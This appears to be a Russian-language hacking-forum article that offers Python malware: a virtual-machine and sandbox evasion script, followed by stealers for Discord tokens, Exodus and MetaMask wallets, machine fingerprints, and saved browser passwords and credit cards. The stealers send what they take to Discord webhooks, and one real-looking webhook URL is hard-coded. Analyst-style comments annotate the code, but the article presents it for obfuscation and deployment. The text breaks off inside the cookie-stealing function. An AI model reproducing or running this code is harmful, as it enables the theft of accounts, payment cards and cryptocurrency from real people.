
Статья Анти VirusTotal и стилеры под разные нужды

Knew100

WID, IP, NAME, GPU, GUIDS, BIOS, и DLL!


Установка:​

sudo apt install python3 && python3-pip
pip3 install uuid wmi requests
python3 kerpy.py

kerpy.py​

Python:
import re, uuid, wmi, requests, os, ctypes, sys, subprocess, socket, platform


def get_base_prefix_compat(): # helper for the virtualenv gate that follows
    """Return the base interpreter prefix.

    Uses ``sys.base_prefix`` when set, otherwise ``sys.real_prefix``,
    otherwise ``sys.prefix``.
    """

    return getattr(sys, "base_prefix", None) or getattr(sys, "real_prefix", None) or sys.prefix


def in_virtualenv():
    """Return True when ``sys.prefix`` differs from the base prefix.

    This detects a Python virtual environment (venv/virtualenv); it does not
    inspect the hardware or the hypervisor.
    """

    return get_base_prefix_compat() != sys.prefix


# Environment gate, evaluated at import time before any other check runs.
# Analyst note: the sample terminates silently here, so a run that shows
# "no behaviour" is not evidence that the file is benign.
if in_virtualenv() == True: # true inside a Python virtualenv (the test is not a VM test)

    sys.exit() # exit

 

class BypassVM:
    """Environment-fingerprinting checks that call sys.exit() on a match.

    Every method compares one host attribute (registry values, process names,
    DLL presence, MAC, user/host name, UUID, GPU, public IP, serial numbers)
    against a hard-coded value or a text list downloaded at run time.

    Observables a defender can key on, all visible in this class:
      * child processes: REG QUERY, TASKLIST piped into find, wmic csproduct;
      * HTTPS GETs to raw.githubusercontent.com for the *_list.txt files
        of the 6nz/virustotal-vm-blacklist repository;
      * an HTTPS GET to api.ipify.org for the public address;
      * WMI queries for display, BIOS, baseboard and disk-drive classes.
    List membership is tested with ``in`` on the whole downloaded text, i.e.
    as a substring match, not as a per-line comparison.
    """


    def registry_check(self):
        """Run two REG QUERY commands against the display-adapter class key.

        os.system() returns each command's exit status; stderr is sent to nul.
        """

        reg1 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul")

        reg2 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul")


        # Terminates when neither command returned exit status 1.
        if reg1 != 1 and reg2 != 1:

            sys.exit()


    def processes_and_files_check(self):
        """Look for VMware/VirtualBox/Sandboxie artefacts: processes and DLLs.

        Reads %SystemRoot% from the environment and shells out to TASKLIST.
        """

        vmware_dll = os.path.join(os.environ["SystemRoot"], "System32\\vmGuestLib.dll")

        virtualbox_dll = os.path.join(os.environ["SystemRoot"], "vboxmrxnp.dll")


        # Running-process listing with the header and separator rows filtered out.
        process = os.popen('TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "="').read()

        processList = []

        # Splits the raw output on single spaces and keeps the fragments that
        # contain ".exe", stripping "K\n" and newlines from each fragment.
        for processNames in process.split(" "):

            if ".exe" in processNames:

                processList.append(processNames.replace("K\n", "").replace("\n", ""))


        if "VMwareService.exe" in processList or "VMwareTray.exe" in processList:

            sys.exit()



        if os.path.exists(vmware_dll): # Detect vmware dll

            sys.exit()



        if os.path.exists(virtualbox_dll): # Detect virtualbox dll

            sys.exit()



        # Attempts to load the Sandboxie DLL by name through ctypes; any
        # exception raised inside the try body is swallowed by the bare except.
        try:

            sandboxie = ctypes.cdll.LoadLibrary("SbieDll.dll") # Detect sandbox dll

            sys.exit()

        except:

            pass       


    def mac_check(self): # Mac detect
        """Compare this host's MAC address with a downloaded list."""

        # uuid.getnode() rendered as 12 hex digits, then grouped in colon-separated pairs.
        mac_address = ':'.join(re.findall('..', '%012x' % uuid.getnode()))



        # Network observable: the list is fetched on every run, with no timeout set.
        mac_list = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txt").text



        if mac_address in mac_list:

            sys.exit()

    def check_pc(self): # User/Name Detect
     # Compares os.getlogin() with pc_name_list.txt and socket.gethostname()
     # with pc_username_list.txt; exits on either substring match.

     vmname = os.getlogin()



     vm_name = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt").text



     if vmname in vm_name:

         sys.exit()

     vmusername = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt").text



     host_name = socket.gethostname()

     if host_name in vmusername:

         sys.exit()



    def hwid_vm(self): # HWID detect
     # Reads the system UUID by spawning "wmic csproduct get uuid" and taking
     # the second line of its output, then checks it against hwid_list.txt.

     current_machine_id = str(subprocess.check_output('wmic csproduct get uuid'), 'utf-8').split('\n')[1].strip()

     hwid_vm = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/hwid_list.txt").text

     if current_machine_id in hwid_vm:

         sys.exit()



    def checkgpu(self): #GPU Detect
     # Queries WMI Win32_DisplayConfiguration; GPUm holds the Description of
     # the last entry returned, which is then checked against gpu_list.txt.

     c = wmi.WMI()

     for gpu in c.Win32_DisplayConfiguration():

        GPUm = gpu.Description.strip()

     gpulist = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt").text

     if GPUm in gpulist:

         sys.exit()



    def check_ip(self): #IP Detect
     # Asks api.ipify.org for the public address and checks it against
     # ip_list.txt. Both requests are outbound HTTPS from the sample itself.

     ip_list = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt").text

     reqip = requests.get("https://api.ipify.org/?format=json").json()

     ip = reqip["ip"]

     if ip in ip_list:

         sys.exit()

    def profiles(): # Guids / Bios Detect etc
     # Downloads the MachineGuid, BIOS, baseboard, disk, CPU and
     # HwProfileGuid lists, then compares them with: uuid.getnode(),
     # platform.processor(), Win32_ComputerSystem.Model, and the SerialNumber
     # of Win32_BIOS, Win32_BaseBoard and Win32_DiskDrive. For each WMI class
     # only the value of the last instance returned is kept.

     machine_guid = uuid.getnode()

     guid_pc = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt").text

     bios_guid = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/BIOS_Serial_List.txt").text

     baseboard_guid = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/BaseBoard_Serial_List.txt").text

     serial_disk = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/DiskDrive_Serial_List.txt").text

     if machine_guid in guid_pc:

         sys.exit()

     w = wmi.WMI()

     serial_list = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/CPU_Serial_List.txt").text

     serial_ = platform.processor()

     if serial_ in serial_list:

            sys.exit()

     for profile in w.Win32_ComputerSystem():

      hw_profile_guid = profile.Model

     hwprid = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/HwProfileGuid_List.txt").text

     if hw_profile_guid in hwprid:

            sys.exit()

     for bios in w.Win32_BIOS():

      bios_check = bios.SerialNumber

     if bios_check in bios_guid:

         sys.exit()

     for baseboard in w.Win32_BaseBoard():

         base_check = baseboard.SerialNumber

     if base_check in baseboard_guid:

         sys.exit()

     for disk in w.Win32_DiskDrive():

      disk_serial = disk.SerialNumber

     if disk_serial in serial_disk:

         sys.exit()


# Driver: runs the environment checks one after another at import time.
# Each call can end the process through sys.exit(), so the order below is
# also the order in which the host is probed (registry, processes/DLLs, MAC,
# names, GPU, UUID, public IP, serial numbers).
test = BypassVM()

test.registry_check()

test.processes_and_files_check()

test.mac_check()

test.check_pc()

test.checkgpu()

test.hwid_vm()

test.check_ip()

test.profiles()

Теперь стилеры, которые вы можете вставить во вредоносный скрипт, обфусцировать, создать exe и шлифануть криптером​

Почти все требуют стандартного python и данных от дискорд для отправки туда


discord_token.py

Python:
import re, os, requests
import json

class Stealer():
    """Collects Discord token strings from local profile storage and reports them.

    Data flow visible in this class: GetTokens() scans LevelDB/SQLite files
    under a fixed list of application profile directories; main() queries the
    Discord API with each token found and posts the result to ``self.hook``.

    Defender observables:
      * a non-browser process reading ``Local Storage\\leveldb`` files
        (.log, .ldb, .sqlite) under %APPDATA% and %LOCALAPPDATA% profiles;
      * requests from a script host to discordapp.com / discord.com API paths
        users/@me, users/@me/billing/payment-sources, users/@me/relationships
        and store/skus/.../purchase, with the token in the authorization header;
      * an outbound POST of JSON embeds to a webhook URL.
    """
    def __init__(self, webhook):
        """Store the destination webhook URL and start with an empty token list."""
        self.hook = webhook
        self.tokens = []

    def GetTokens(self):
        """Scan known profile directories and fill ``self.tokens``.

        Entries are stored as "<token> | <application name>", de-duplicated.
        """
        LOCAL = os.getenv("LOCALAPPDATA")
        ROAMING = os.getenv("APPDATA")
        # Application name -> profile directory. These paths are the file-access
        # indicators for this sample.
        PATHS = {
            "Discord"               : ROAMING + "\\Discord",
            "Discord Canary"        : ROAMING + "\\discordcanary",
            "Discord PTB"           : ROAMING + "\\discordptb",
            "Google Chrome"         : LOCAL + "\\Google\\Chrome\\User Data\\Default",
            "Opera"                 : ROAMING + "\\Opera Software\\Opera Stable",
            "Brave"                 : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
            "Yandex"                : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default",
            'Lightcord'             : ROAMING + "\\Lightcord",
            'Opera GX'              : ROAMING + "\\Opera Software\\Opera GX Stable",
            'Amigo'                 : LOCAL + "\\Amigo\\User Data",
            'Torch'                 : LOCAL + "\\Torch\\User Data",
            'Kometa'                : LOCAL + "\\Kometa\\User Data",
            'Orbitum'               : LOCAL + "\\Orbitum\\User Data",
            'CentBrowser'           : LOCAL + "\\CentBrowser\\User Data",
            '7Star'                 : LOCAL + "\\7Star\\7Star\\User Data",
            'Sputnik'               : LOCAL + "\\Sputnik\\Sputnik\\User Data",
            'Vivaldi'               : LOCAL + "\\Vivaldi\\User Data\\Default",
            'Chrome SxS'            : LOCAL + "\\Google\\Chrome SxS\\User Data",
            'Epic Privacy Browser'  : LOCAL + "\\Epic Privacy Browser\\User Data",
            'Microsoft Edge'        : LOCAL + "\\Microsoft\\Edge\\User Data\\Default",
            'Uran'                  : LOCAL + "\\uCozMedia\\Uran\\User Data\\Default",
            'Iridium'               : LOCAL + "\\Iridium\\User Data\\Default\\Local Storage\\leveld",
            'Firefox'               : ROAMING + "\\Mozilla\\Firefox\\Profiles",
        }

        for platform, path in PATHS.items():
            # The storage sub-directory is appended to every entry.
            path += "\\Local Storage\\leveldb"
            if os.path.exists(path):
                for file_name in os.listdir(path):
                    if file_name.endswith(".log") or file_name.endswith(".ldb") or file_name.endswith(".sqlite"):
                        # Files are read as text with decoding errors ignored, line by line.
                        for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
                            # Two token shapes are matched: three dot-separated
                            # segments, and the "mfa." prefixed form.
                            for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
                                for token in re.findall(regex, line):
                                    if token + " | " + platform not in self.tokens:
                                        self.tokens.append(token + " | " + platform)

    def getuserinfo(self, token):
        """Return the users/@me JSON for ``token``, or None on any exception."""
        try:
            return requests.get("https://discordapp.com/api/v9/users/@me", headers={"content-type": "application/json", "authorization": token}).json()
        except:return None

    def buy_nitro(self, token):
        """Query the account's payment sources and conditionally POST a store purchase.

        Returns the ``gift_code`` field of the purchase response when that
        branch runs, the string "None" on any exception, and otherwise falls
        through without a return statement.
        Impact note: this is the one method that attempts a financial action
        on the victim account rather than only reading data.
        """
        try:
            r = requests.get('https://discordapp.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': token})
            if r.status_code == 200:
                payment_source_id = r.json()[0]['id']
                if '"invalid": ture' in r.text:
                    r = requests.post(f'https://discord.com/api/v6/store/skus/521847234246082599/purchase', headers={'Authorization': token}, json={'expected_amount': 1,'gift': True,'payment_source_id': payment_source_id})
                    return r.json()['gift_code']
        except:return "None"

    def RareFriend(self, token):
        """List relationships whose ``public_flags`` equals one of seven fixed values.

        Returns one "<badge> | <id>" line per match, "No Rare Friends" when
        nothing matched, or "None, Except Error" on any exception.
        """
        friends = ""
        try:
            req = requests.get("https://discord.com/api/v9/users/@me/relationships", headers={"content-type": "application/json", "authorization": token}).json()

            for user in req:
                badge = ""
                # Exact equality on the flag value, not a bit test.
                if user["user"]["public_flags"] == 1:badge = "Staff"
                elif user["user"]["public_flags"] == 2:badge = "Partner"
                elif user["user"]["public_flags"] == 4:badge = "Hypesquad Events"
                elif user["user"]["public_flags"] == 8:badge = "BugHunter 1"
                elif user["user"]["public_flags"] == 512:badge = "Early"
                elif user["user"]["public_flags"] == 16384:badge = "BugHunter 2"
                elif user["user"]["public_flags"] == 131072:badge = "Developer"
                else:badge = ""

                if badge != "":friends += badge + " | " + user['id'] + "\n"     
            if friends == "":friends += "No Rare Friends"     
            return friends
        except:return "None, Except Error"

    def main(self):
        """Build one embed per collected token and POST them all to the webhook.

        Data leaving the host per token: username, user id, e-mail, phone,
        locale, bio, MFA and billing status, badge text, the token itself and
        the RareFriend() listing. Any exception while processing a token is
        swallowed and that token is skipped.
        """
        embeds = []
        for token_line in self.tokens:
            try:
                # Entries have the form "<token> | <application name>".
                token = token_line.split(" | ")[0]
                plateform = token_line.split(" | ")[1]
                # Locale code -> display text used in the report.
                languages = {'da':'Danish, Denmark','de':'German, Germany','en-GB':'English, United Kingdom','en-US':'English, United States','es-ES':'Spanish, Spain','fr':'French, France','hr':'Croatian, Croatia','lt':'Lithuanian, Lithuania','hu':'Hungarian, Hungary','nl':'Dutch, Netherlands','no':'Norwegian, Norway','pl':'Polish, Poland','pt-BR':'Portuguese, Brazilian, Brazil','ro':'Romanian, Romania','fi':'Finnish, Finland','sv-SE':'Swedish, Sweden','vi':'Vietnamese, Vietnam','tr':'Turkish, Turkey','cs':'Czech, Czechia, Czech Republic','el':'Greek, Greece','bg':'Bulgarian, Bulgaria','ru':'Russian, Russia','uk':'Ukranian, Ukraine','th':'Thai, Thailand','zh-CN':'Chinese, China','ja':'Japanese','zh-TW':'Chinese, Taiwan','ko':'Korean, Korea'}
                get_infos = self.getuserinfo(token)
                username = get_infos["username"] + "#" + get_infos["discriminator"]
                user_id = get_infos["id"]
                user_avatar = get_infos["avatar"]
                try:user_banner = get_infos["banner"]
                except:user_banner = None
                email = get_infos["email"] or "❌"
                phone = get_infos["phone"] or "❌"
                local = languages.get(get_infos["locale"])
                bio = get_infos["bio"] or "❌"
                mmfa = get_infos["mfa_enabled"]
                # True when the payment-sources response is a non-empty JSON value.
                bbilling = bool(len(json.loads(requests.get("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers={"content-type": "application/json", "authorization": token}).text)) > 0)
                if bbilling == True:billing = "✔️"
                else:billing = "❌"         
                if mmfa == True:mfa = "✔️"
                else:mfa = "❌"
                badges = ""
                flags = get_infos['flags']
                # Exact equality against single flag values.
                if (flags == 1):badges += "Staff, "
                if (flags == 2):badges += "Partner, "
                if (flags == 4):badges += "Hypesquad Event, "
                if (flags == 8):badges += "Green Bughunter, "
                if (flags == 64):badges += "Hypesquad Bravery, "
                if (flags == 128):badges += "HypeSquad Brillance, "
                if (flags == 256):badges += "HypeSquad Balance, "
                if (flags == 512):badges += "Early Supporter, "
                if (flags == 16384):badges += "Gold BugHunter, "
                if (flags == 131072):badges += "Verified Bot Developer, "
                if (badges == ""):badges = "❌"         
                try:
                    if get_infos["premium_type"] == "1" or get_infos["premium_type"] == 1:nitro_type = "✔️ Nitro Classic"
                    elif get_infos["premium_type"] == "2" or get_infos["premium_type"] == 2:nitro_type = "✔️ Nitro Boost"
                    else:nitro_type = "❌ No Nitro"
                except:nitro_type = "❌ No Nitro"
                nnitro_buyed = self.buy_nitro(token)
                if nnitro_buyed == None:nitro_buyed = "❌"
                else:nitro_buyed = "✔️ discord.gift/" + nnitro_buyed     
                # Report layout. The fixed field names and footer text below are
                # stable strings that can serve as content signatures.
                embed = {
                    "color": 0x7289da,
                    "fields": [
                        {
                            "name": "**__User Infos:__**",
                            "value": f"- __Username:__ `{username}`\n- __User ID:__ `{user_id}`\n- __Email:__ `{email}`\n- __Phone:__ `{phone}`\n- __Nitro Type:__ `{nitro_type}`\n- __Local:__ `{local}`\n- __Badges:__ `{badges}`\n- __Billing:__ `{billing}`\n- __A2F Enable:__ `{mfa}`"
                        },
                        {
                            "name": "__**About:**__",
                            "value": f"```{bio}```"
                        },
                        {
                            "name": "__**Token:**__",
                            "value": f"Plateform: **{plateform}**\n```\n{token}\n```"
                        },
                        {
                            "name": "__**Nitro Buy:**__",
                            "value": f"`{nitro_buyed}`"
                        },
                        {
                            "name": "__**Rare Friends:**__",
                            "value": f"```{self.RareFriend(token)}```"
                        }
                    ],
                    "author": {
                        "name": f"{username} ({user_id})",
                        "icon_url": f"https://cdn.discordapp.com/avatars/{user_id}/{user_avatar}"
                    },
                    "footer": {
                        "text": f"Stealer Builder by KanekiWeb  -  kanekiweb.tk",
                        "icon_url": f"https://cdn.discordapp.com/avatars/{user_id}/{user_avatar}"
                    },
                    "image": {
                        "url": f"https://cdn.discordapp.com/banners/{user_id}/{user_banner}?size=1024"
                    },
                    "thumbnail": {
                        "url": f"https://cdn.discordapp.com/avatars/{user_id}/{user_avatar}?size=1024"
                    }
                }
                embeds.append(embed)         
            except:pass 
        # Single exfiltration request, sent even when no embed was built.
        requests.post(self.hook, headers={"content-type": "application/json"}, data=json.dumps({"content": "","embeds": embeds,"username": "Stealer Builder","avatar_url": "https://cdn.discordapp.com/avatars/922450497074495539/a_c1738e5280f6e70487ef02d307c62a07?size=1024"}).encode())
  
# Entry point: runs at import time. The constructor argument is the
# destination webhook; on the page it is a placeholder string.
Grabber = Stealer("U WEBHOOK URL")
Grabber.GetTokens()
Grabber.main()

exodus.py

Python:
import os.path, shutil, requests

# Flat script: copies the Exodus wallet data directory out of the user
# profile, zips it and uploads the archive.
# Defender observables: a recursive copy of %APPDATA%\Exodus into
# %LOCALAPPDATA%\Temp\Exodus, creation of Temp\Exodus.zip, and a multipart
# POST of that file from a script host.
user = os.path.expanduser("~")

hook = ""  # upload destination; empty on the page
if os.path.exists(user+"\\AppData\\Roaming\\Exodus"):
 shutil.copytree(user+"\\AppData\\Roaming\\Exodus", user+"\\AppData\\Local\\Temp\\Exodus")
 shutil.make_archive(user+"\\AppData\\Local\\Temp\\Exodus", "zip", user+"\\AppData\\Local\\Temp\\Exodus")

 file = {'file': open(user+"\\AppData\\Local\\Temp\\Exodus.zip", 'rb')}
 r = requests.post(hook, files=file)
 # Cleanup is best-effort; every error is swallowed.
 # Forensic note: os.remove() does not delete directories, so the copied
 # Temp\Exodus directory is likely to remain on disk after a run.
 try:
  os.remove(user+"\\AppData\\Local\\Temp\\Exodus.zip")
  os.remove(user+"\\AppData\\Local\\Temp\\Exodus")
 except:
   pass

machine.py


Python:
import requests, wmi, subprocess, psutil, platform, json

# Hard-coded upload destination (a Discord webhook URL). Network indicator:
# the same URL is reused by other scripts on this page.
hook = "https://discord.com/api/webhooks/1073970412322566175/HtYFF6lf77URUMpHJPH-egvs0iOSEsYV6yXuuPmw3QGvXG1A_rJRFYX3z9p6jYcRrjgl"

def get_mac_address():
    """Return the link-layer address of the interface named "Wi-Fi".

    Returns None implicitly when no interface has that exact name or the
    interface has no AF_LINK address.
    """
    for interface, addrs in psutil.net_if_addrs().items():
        if interface == "Wi-Fi":
            for addr in addrs:
                if addr.family == psutil.AF_LINK:
                    mac = addr.address
                    return mac

def machineinfo():
    """Collect a host fingerprint and POST it to the module-level ``hook``.

    Fields sent: node name, OS string, total RAM, display description, CPU
    string, system UUID, Wi-Fi MAC and public IP.
    Defender observables: a WMI display query, a spawned
    "wmic csproduct get uuid", a GET to api.ipify.org, then a JSON POST.
    """

    mem = psutil.virtual_memory()

    c = wmi.WMI()
    # GPUm keeps the Description of the last instance returned.
    for gpu in c.Win32_DisplayConfiguration():
        GPUm = gpu.Description.strip()

    # Second line of the wmic output is taken as the UUID.
    current_machine_id = str(subprocess.check_output('wmic csproduct get uuid'), 'utf-8').split('\n')[1].strip()

    # Public address lookup through a third-party service.
    reqip = requests.get("https://api.ipify.org/?format=json").json()

    mac = get_mac_address()

    # The fixed title/description strings and field names below are stable
    # content that can be matched in captured traffic or in the file itself.
    payload = {
        "embeds": [
            {
                "title": "Machine Info",
                "username": "github.com/lawxsz",
                "avatar_url": "https://cdn.discordapp.com/attachments/1073683220148785222/1077827511691530240/photo_2022-10-01_18-57-36.jpg",
                "description": "Github.com/Lawxsz/make-u-own-stealer",
                "fields": [
                    {
                        "name": ":computer: PC",
                        "value": f"`{platform.node()}`",
                        "inline": True
                    },
                    {
                        "name": ":desktop: OS:",
                        "value": f"`{platform.platform()}`",
                        "inline": True
                    },
                    {
                        "name": ":wrench: RAM",
                        "value": f"`{mem.total / 1024**3} GB`",
                        "inline": True
                    },
                    {
                        "name": ":pager: GPU",
                        "value": f"`{GPUm}`",
                        "inline": True
                    },
                    {
                        "name": ":zap: CPU",
                        "value": f"`{platform.processor()}`",
                        "inline": True
                    },
                    {
                        "name": ":key: HWID",
                        "value": f"`{current_machine_id}`",
                        "inline": True
                    },
                    {
                        "name": ":label: MAC",
                        "value": f"`{mac}`",
                        "inline": True
                    },
                    {
                        "name": ":crossed_swords: IP",
                        "value": f"`{reqip['ip']}`",
                        "inline": True
                    }
                ]
            }
        ]
    }

    headers = {
        "Content-Type": "Application/Json"
    }
    r = requests.post(hook, data=json.dumps(payload), headers=headers)
 
# Runs the collection and upload at import time; there is no __main__ guard.
machineinfo()

metamask.py


Python:
import requests, os, os.path, shutil

# Profile root used to build every path in this script.
user = os.path.expanduser("~")

# Hard-coded upload destination (Discord webhook URL); a network indicator.
hook = "https://discord.com/api/webhooks/1073970412322566175/HtYFF6lf77URUMpHJPH-egvs0iOSEsYV6yXuuPmw3QGvXG1A_rJRFYX3z9p6jYcRrjgl"

def make(args, brow, count):
   """Copy one extension-storage directory into %LOCALAPPDATA%\\Temp.

   Args:
       args: source directory path to test and copy.
       brow: label used in the destination name ``Metamask_<brow>``.
       count: running counter, only printed.

   As written, the archive, upload and delete statements sit inside the
   ``except shutil.Error`` handler, after its ``pass``.
   Defender observable: a recursive copy of a browser
   "Local Extension Settings" sub-directory into Temp\\Metamask_<brow>.
   """
   try:
    if os.path.exists(args):
     shutil.copytree(args, user+f"\\AppData\\Local\\Temp\\Metamask_{brow}")

     print(f"New Wallet found! : Total: {count}\nWallet: MetaMask_{brow}")
   except shutil.Error:
       pass
       shutil.make_archive(user+f"\\AppData\\Local\\Temp\\Metamask_{brow}", "zip", user+f"\\AppData\\Local\\Temp\\Metamask_{brow}")
       file = {"file": open(user+f"\\AppData\\Local\\Temp\\Metamask_{brow}.zip", 'rb')}
       r = requests.post(hook, files=file)
       os.remove(user+f"\\AppData\\Local\\Temp\\Metamask_{brow}")
       os.remove(user+f"\\AppData\\Local\\Temp\\Metamask_{brow}.zip")
def yea():
 """Call make() for each candidate extension-storage path.

 The list pairs a "Local Extension Settings\\<extension id>" directory with a
 browser label. These paths are the file-access indicators for this script.
 An IndexError raised while iterating ends the loop silently.
 """

 meta_paths = [

        [f"{user}\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\ejbalbakoplchlghecdalmeeeajnimhm",               "Edge"               ],
        [f"{user}\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn",               "Edge"               ],
        [f"{user}\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn",               "Brave"               ],
        [f"{user}\\AppData\\Local\\Google\\Chrome\\User Data\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"               "Google"               ],
        [f"{user}\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn",               "OperaGX"               ]
    ]
 count = 0
 try:
  for i in meta_paths:
   make(i[0], brow=i[1], count=count)
   count+=1
 except IndexError:
     pass
 
# Runs at import time; there is no __main__ guard.
yea()

passwords_cards_cookies.py


Python:
import os, requests, json, base64, sqlite3, shutil
from win32crypt import CryptUnprotectData
from Crypto.Cipher import AES
from datetime import datetime

# Hard-coded Discord webhook URL. Nothing in the functions or the __main__
# block visible below passes it to a request.
hook = "https://discord.com/api/webhooks/1073970412322566175/HtYFF6lf77URUMpHJPH-egvs0iOSEsYV6yXuuPmw3QGvXG1A_rJRFYX3z9p6jYcRrjgl"

appdata = os.getenv('LOCALAPPDATA')
user = os.path.expanduser("~")

# Browser label -> "User Data" root under %LOCALAPPDATA%. All entries are
# Chromium-style layouts; these roots are the file-access indicators.
browsers = {
    'amigo': appdata + '\\Amigo\\User Data',
    'torch': appdata + '\\Torch\\User Data',
    'kometa': appdata + '\\Kometa\\User Data',
    'orbitum': appdata + '\\Orbitum\\User Data',
    'cent-browser': appdata + '\\CentBrowser\\User Data',
    '7star': appdata + '\\7Star\\7Star\\User Data',
    'sputnik': appdata + '\\Sputnik\\Sputnik\\User Data',
    'vivaldi': appdata + '\\Vivaldi\\User Data',
    'google-chrome-sxs': appdata + '\\Google\\Chrome SxS\\User Data',
    'google-chrome': appdata + '\\Google\\Chrome\\User Data',
    'epic-privacy-browser': appdata + '\\Epic Privacy Browser\\User Data',
    'microsoft-edge': appdata + '\\Microsoft\\Edge\\User Data',
    'uran': appdata + '\\uCozMedia\\Uran\\User Data',
    'yandex': appdata + '\\Yandex\\YandexBrowser\\User Data',
    'brave': appdata + '\\BraveSoftware\\Brave-Browser\\User Data',
    'iridium': appdata + '\\Iridium\\User Data',
}


def get_master_key(path: str):
    """Read and unwrap the ``os_crypt.encrypted_key`` from a browser's Local State.

    Returns None implicitly when ``path`` does not exist or the file has no
    ``os_crypt`` text. Otherwise returns the bytes produced by
    CryptUnprotectData.
    Defender note: the unwrap only works in the logged-on user's context, so
    the telling event is a non-browser process reading "Local State" and then
    calling DPAPI.
    """
    if not os.path.exists(path):
        return

    if 'os_crypt' not in open(path + "\\Local State", 'r', encoding='utf-8').read():
        return

    with open(path + "\\Local State", "r", encoding="utf-8") as f:
        c = f.read()
    local_state = json.loads(c)

    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    # Drops the first 5 bytes before unwrapping; presumably a fixed prefix
    # on the stored key, confirm against the browser's format.
    master_key = master_key[5:]
    master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key


def decrypt_password(buff: bytes, master_key: bytes) -> str:
    """Decrypt one stored value with AES-GCM and return it as text.

    Bytes 3..14 of ``buff`` are used as the nonce and the rest as the payload.
    ``decrypt()`` is called without tag verification; the last 16 bytes of the
    output are discarded before decoding.
    """
    iv = buff[3:15]
    payload = buff[15:]
    cipher = AES.new(master_key, AES.MODE_GCM, iv)
    decrypted_pass = cipher.decrypt(payload)
    decrypted_pass = decrypted_pass[:-16].decode()

    return decrypted_pass


def save_results(browser_name, data_type, content):
    """Write ``content`` to Temp\\Browser\\<browser_name>\\<data_type>.txt.

    Both directories are created if missing, even when ``content`` is None.
    Forensic note: the output is plain text under %LOCALAPPDATA%\\Temp\\Browser
    and nothing in this function deletes it.
    """
    if not os.path.exists(user+'\\AppData\\Local\\Temp\\Browser'):
        os.mkdir(user+'\\AppData\\Local\\Temp\\Browser')
    if not os.path.exists(user+f'\\AppData\\Local\\Temp\\Browser\\{browser_name}'):
        os.mkdir(user+f'\\AppData\\Local\\Temp\\Browser\\{browser_name}')
    if content is not None:
        open(user+f'\\AppData\\Local\\Temp\\Browser\\{browser_name}\\{data_type}.txt', 'w', encoding="utf-8").write(content)

def get_login_data(path: str, profile: str, master_key):
    """Return the profile's saved logins as formatted text, or None if absent.

    The "Login Data" SQLite file is copied to Temp\\login_db, queried, and the
    copy is removed afterwards.
    Defender observable: a copy of "Login Data" to a fixed temp file name by
    a non-browser process.
    """
    login_db = f'{path}\\{profile}\\Login Data'
    if not os.path.exists(login_db):
        return
    result = ""
    shutil.copy(login_db, user+'\\AppData\\Local\\Temp\\login_db')
    conn = sqlite3.connect(user+'\\AppData\\Local\\Temp\\login_db')
    cursor = conn.cursor()
    cursor.execute('SELECT action_url, username_value, password_value FROM logins')
    for row in cursor.fetchall():
        # row[2] is the encrypted password blob.
        password = decrypt_password(row[2], master_key)
        result += f"""
        URL: {row[0]}
        Email: {row[1]}
        Password: {password}
  
        """
    conn.close()
    os.remove(user+'\\AppData\\Local\\Temp\\login_db')
    return result


def get_credit_cards(path: str, profile: str, master_key):
    """Return the profile's stored payment cards as formatted text, or None if absent.

    The "Web Data" SQLite file is copied to Temp\\cards_db, queried, and the
    copy is removed afterwards. Rows with an empty name, month, year or
    encrypted number are skipped.
    """
    cards_db = f'{path}\\{profile}\\Web Data'
    if not os.path.exists(cards_db):
        return

    result = ""
    shutil.copy(cards_db, user+'\\AppData\\Local\\Temp\\cards_db')
    conn = sqlite3.connect(user+'\\AppData\\Local\\Temp\\cards_db')
    cursor = conn.cursor()
    cursor.execute(
        'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards')
    for row in cursor.fetchall():
        if not row[0] or not row[1] or not row[2] or not row[3]:
            continue

        # row[3] is the encrypted card number.
        card_number = decrypt_password(row[3], master_key)
        result += f"""
        Name Card: {row[0]}
        Card Number: {card_number}
        Expires:  {row[1]} / {row[2]}
        Added: {datetime.fromtimestamp(row[4])}
  
        """

    conn.close()
    os.remove(user+'\\AppData\\Local\\Temp\\cards_db')
    return result


def get_cookies(path: str, profile: str, master_key):
    """Return the profile's cookies as formatted text, or None if absent.

